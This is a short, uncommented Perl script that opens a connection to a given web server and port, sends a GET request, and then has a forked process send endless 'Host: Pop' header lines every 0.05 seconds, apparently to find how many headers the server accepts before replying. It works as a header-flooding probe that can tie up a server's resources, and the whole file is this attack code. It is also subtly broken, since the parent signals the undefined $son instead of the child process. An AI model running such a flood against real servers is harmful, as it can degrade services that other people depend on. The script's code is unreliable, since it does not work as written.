use IO::Socket;

$n=0;
sub Count
{
print "\n\e[32mMaximum headers supported: $n\e[0m\n";
}

$s=new IO::Socket::INET->new
	(PeerAddr=>$ARGV[0],
	 PeerPort=>$ARGV[1]) || die "Cannot connect";

print $s "GET / HTTP/1.1\r\n";

$father=fork();
if (!$father)
{
	$SIG{INT}=\&Count;
	for($n=0;$s;$n++)
	{
		print $s "Host: Pop\r\n";
		select($a,$b,$c,.05);
	}
} else {
	<$s>;
	kill INT, $son;
}

